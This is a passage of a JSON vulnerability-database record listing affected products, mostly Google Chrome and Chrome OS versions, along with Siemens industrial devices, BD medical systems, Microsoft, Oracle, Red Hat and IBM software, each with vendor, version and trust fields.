        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.2"
      },
      {
        "model": "windows server r2 for itanium-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.120"
      },
      {
        "model": "simatic itp1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.935.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.705.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1082.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1016.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.395.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.118"
      },
      {
        "model": "ruggedcom rx1400 vpe",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.776.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.72"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1075.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "43.0.2357.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.172"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.117"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.535.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.443.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.296.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.107"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.776.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.96379"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.217"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.900.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1074.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.126"
      },
      {
        "model": "x-series xos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "10.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.611.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.407.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.57"
      },
      {
        "model": "pyxis medstation es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.892.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.518.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.346.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1658.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.897.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.421.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.132"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.56"
      },
      {
        "model": "pyxis stockstation system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.0"
      },
      {
        "model": "simotion p320-4s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "36.0.1985.143"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1003.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.927.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.382.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2623.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.55"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.462.0"
      },
      {
        "model": "simatic ipc827d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1021.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.77"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.818.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.645.0"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.126"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.23"
      },
      {
        "model": "chrome ~~~and",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "38.0.2125.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1065.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.674.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.905.0"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.169"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.531.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.23"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1284.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.115"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1040.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.35"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.939.0"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017030"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.758.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.19"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.1.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.99"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.184"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.154"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.112"
      },
      {
        "model": "windows for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.109"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.344"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.419.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.672.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.608.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.135"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.675.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.117"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.755.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1072.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.435.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.215"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.63"
      },
      {
        "model": "pyxis medication administration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.617.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1019.0"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.685.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.312"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.110"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.63"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.699.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.453.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.961.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.202"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.341"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1058"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "56.0.2924.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1662.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1669.3"
      },
      {
        "model": "facsverse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1054"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.506.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.132"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.16"
      },
      {
        "model": "kiestra tla/wca",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.82"
      },
      {
        "model": "chrome",
